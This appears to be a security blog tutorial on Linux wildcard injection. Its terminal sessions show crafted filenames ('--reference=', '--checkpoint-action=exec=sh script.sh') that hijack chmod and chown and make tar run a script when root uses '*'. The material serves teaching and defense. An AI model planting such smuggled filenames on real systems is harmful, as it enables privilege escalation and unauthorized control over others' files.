Monday, January 11, 2021

Privilege Escalation in Linux via Wildcards

What is a wildcard

A wildcard is a character that can be used as a substitute for any of a class of characters in a search, thereby greatly increasing the flexibility and efficiency of searches.

Wildcards 

* - Matches any number of characters. (backup* = backup1, backup2, backup3)
? - Matches any single character. (file? = fileA, fileB, fileC)
[] - Encloses a set of characters or a single character and matches those characters. ([abc])
- - The hyphen denotes a ranges of characters or numbers. ([a-z] = abc..z)
~ - The tilde expands to the users home directory (~ = /home/sam)

The wilcard we will be working with today will be the '*' or star wildcard. Some of the examples of the star wilcard in action is as follows: 

# list all tmp files
ls *.tmp

# Remove all files beginning with backup
rm -r backup*

When we invoke the star wildcard, the filenames expand onto the command line. 

sam@debian:~$ ls -l *.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 a.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 b.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 c.tmp
sam@debian:~$

Would be the same as typing this: 

sam@debian:~$ ls -l a.tmp b.tmp c.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 a.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 b.tmp
-rw-r--r-- 1 sam sam 0 Jan 11 18:58 c.tmp
sam@debian:~$

If we ls the '/backup' directory we see we have three files inside. We will next use the 'cat' utility to cat the contents of all the files inside the directory using the star '*' wildcard. 

sam@debian:~/backup$ ls -l
total 12
-rw-r--r-- 1 sam sam 15 Jan 11 16:59 a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59 b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59 c.tmp
sam@debian:~/backup$ 
sam@debian:~/backup$ cat *
this is a test
this is another test
this is yet another test
sam@debian:~/backup$

The 'cat' command executed successfully and printed the contents of the three files on the screen. The filenames were expaned so the file command looks like so: 

sam@debian:~/backup$ cat a.tmp b.tmp c.tmp

So with that in mind, what if we were to create a file or directory with the name of an option to the program 'cat', such as '--help' and use the wildcard character. 

sam@debian:~/backup$ echo "" > "--help"
sam@debian:~/backup$ 
sam@debian:~/backup$ ls -l
total 16
-rw-r--r-- 1 sam sam 15 Jan 11 16:59 a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59 b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59 c.tmp
-rw-r--r-- 1 sam sam  1 Jan 11 19:15 --help
sam@debian:~/backup$

As you can see we created a file called '--help' in the directory. Next we will invoke the 'cat' command with the star wildcard character and see what happens. 

sam@debian:~/backup$ cat *
Usage: cat [OPTION]... [FILE]...
Concatenate FILE(s) to standard output.

With no FILE, or when FILE is -, read standard input.

  -A, --show-all           equivalent to -vET
  -b, --number-nonblank    number nonempty output lines, overrides -n
  -e                       equivalent to -vE
  -E, --show-ends          display $ at end of each line
  -n, --number             number all output lines
  -s, --squeeze-blank      suppress repeated empty output lines
  -t                       equivalent to -vT
  -T, --show-tabs          display TAB characters as ^I
  -u                       (ignored)
  -v, --show-nonprinting   use ^ and M- notation, except for LFD and TAB
      --help     display this help and exit
      --version  output version information and exit

Examples:
  cat f - g  Output f's contents, then standard input, then g's contents.
  cat        Copy standard input to standard output.

GNU coreutils online help: 
Full documentation at: 
or available locally via: info '(coreutils) cat invocation'
sam@debian:~/backup$

We got back the help dialog of the 'cat' command. The full command looks like this after the star wildcard is expanded: 

sam@debian:~/backup$ cat a.tmp b.tmp c.tmp --help

When the star wildcard expanded the filenames onto the command like it also expanded our '--help' filename which triggered the 'cat' utility to read our filename as a program option and displayed the help dialog.

Using this technique we can trick certain programs to execute additional options which can lead to privilege escalation.

File Hijacking using CHOWN and CHMOD

chmod

The '--reference=' option allows you to change the user and group ownership of given files to be same as those of the specified reference file. We can use this option in both 'chown' and 'chmod' along with the star wildcard character to hijack files from a user and change file permissions for all files in a directory.

For this we are going to create two files which we will use to hijack the remaining files in the directory using the wildcard principal above. 

dax@debian:/home/sam/backup$ echo "" > myfile.tmp
dax@debian:/home/sam/backup$ chmod 777 myfile.tmp
dax@debian:/home/sam/backup$ echo "" > "--reference=myfile.tmp"

If we list the directory we will see our file 'myfile.tmp' is '-rwxrwxrwx'. We want to set all the files in the directory to '-rwxrwxrwx'. 

dax@debian:/home/sam/backup$ ls -l
total 20
-rw-r--r-- 1 sam sam 15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59  c.tmp
-rwxrwxrwx 1 dax dax  1 Jan 11 21:17  myfile.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 21:18 '--reference=myfile.tmp'
dax@debian:/home/sam/backup$

If 'root' comes along and trys to chmod the files using the star wildcard, this will happen: 

root@debian:/home/sam/backup# chmod 000 *
chmod: cannot access '000': No such file or directory
root@debian:/home/sam/backup# ls -l
total 20
-rwxrwxrwx 1 sam sam 15 Jan 11 16:59  a.tmp
-rwxrwxrwx 1 sam sam 21 Jan 11 16:59  b.tmp
-rwxrwxrwx 1 sam sam 25 Jan 11 16:59  c.tmp
-rwxrwxrwx 1 dax dax  1 Jan 11 21:17  myfile.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 21:18 '--reference=myfile.tmp'
root@debian:/home/sam/backup#

Now all the files have '-rwxrwxrwx' permissions applied to them.

chown

Chown works on the same principal as 'chmod'. We start off by creating two files in the directory. 

dax@debian:/home/sam/backup$ echo "" > myfile.tmp
dax@debian:/home/sam/backup$ echo "" > "--reference=myfile.tmp"
dax@debian:/home/sam/backup$ 
dax@debian:/home/sam/backup$ ls -l
total 20
-rw-r--r-- 1 sam sam 15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam 21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam 25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 20:45  myfile.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 20:45 '--reference=myfile.tmp'
dax@debian:/home/sam/backup$

As you can see we have two files created where the user 'dax' owns the files while the rest of the files are owned by 'sam'. Next we want to run 'chown' as 'root' and try and change the owner of the files with the star wildcard character. 

root@debian:/home/sam/backup# chown -R nobody:nobody *.tmp
chown: cannot access 'nobody:nobody': No such file or directory
root@debian:/home/sam/backup#

If we look at the directory listing now, we see that all files are now owned by the user 'dax'. 

root@debian:/home/sam/backup# ls -l
total 16
-rw-r--r-- 1 dax dax 15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 dax dax 21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 dax dax 25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 dax dax  1 Jan 11 20:09 '--reference=reference.tmp'
-rw-r--r-- 1 dax dax  0 Jan 11 20:07  reference.tmp
root@debian:/home/sam/backup#

Script Execution using Tar Checkpoints

The 'tar' program has the ability to run 'checkpoints' at certain times during the archive process. There are two flags associated with this, they are '--checkpoint' and '--checkpoint-action'. The '--checkpoint' option tells tar at what record do you want the checkpoint action to run at, while the '--checkpoint-action' option tells tar what task to execute at that checkpoint.

We need to create three files in order to carry this out. The first file will be our script to be executed. The other two files will be our options we want tar to execute at the specifed time. 

sam@debian:~/backup$ echo "echo owned>owned" > script.sh
sam@debian:~/backup$ echo "" > "--checkpoint=1"
sam@debian:~/backup$ echo "" > "--checkpoint-action=exec=sh script.sh"
sam@debian:~/backup$ ls -l
total 40
-rw-r--r-- 1 sam sam    15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam    21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam     1 Jan 11 17:30 '--checkpoint=1'
-rw-r--r-- 1 sam sam     1 Jan 11 17:31 '--checkpoint-action=exec=sh script.sh'
-rw-r--r-- 1 sam sam    25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 sam sam    17 Jan 11 17:35  script.sh
sam@debian:~/backup

When we run the 'tar' command it will expand into: 

tar cf archive.tar a.tmp b.tmp c.tmp --checkpoint=1 --checkpoint-action=exec=sh script.sh

If we run the tar program and ls the directory we see the script executed successfully. 

sam@debian:~/backup$ tar cf archive.tar *
sam@debian:~/backup$ ls -l
total 40
-rw-r--r-- 1 sam sam 10240 Jan 11 17:35  archive.tar
-rw-r--r-- 1 sam sam    15 Jan 11 16:59  a.tmp
-rw-r--r-- 1 sam sam    21 Jan 11 16:59  b.tmp
-rw-r--r-- 1 sam sam     1 Jan 11 17:30 '--checkpoint=1'
-rw-r--r-- 1 sam sam     1 Jan 11 17:31 '--checkpoint-action=exec=sh script.sh'
-rw-r--r-- 1 sam sam    25 Jan 11 16:59  c.tmp
-rw-r--r-- 1 sam sam     6 Jan 11 17:35  owned
-rw-r--r-- 1 sam sam    17 Jan 11 17:35  script.sh
sam@debian:~/backup$

As you can see we created the 'owned' file in the directory via our script.sh program.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...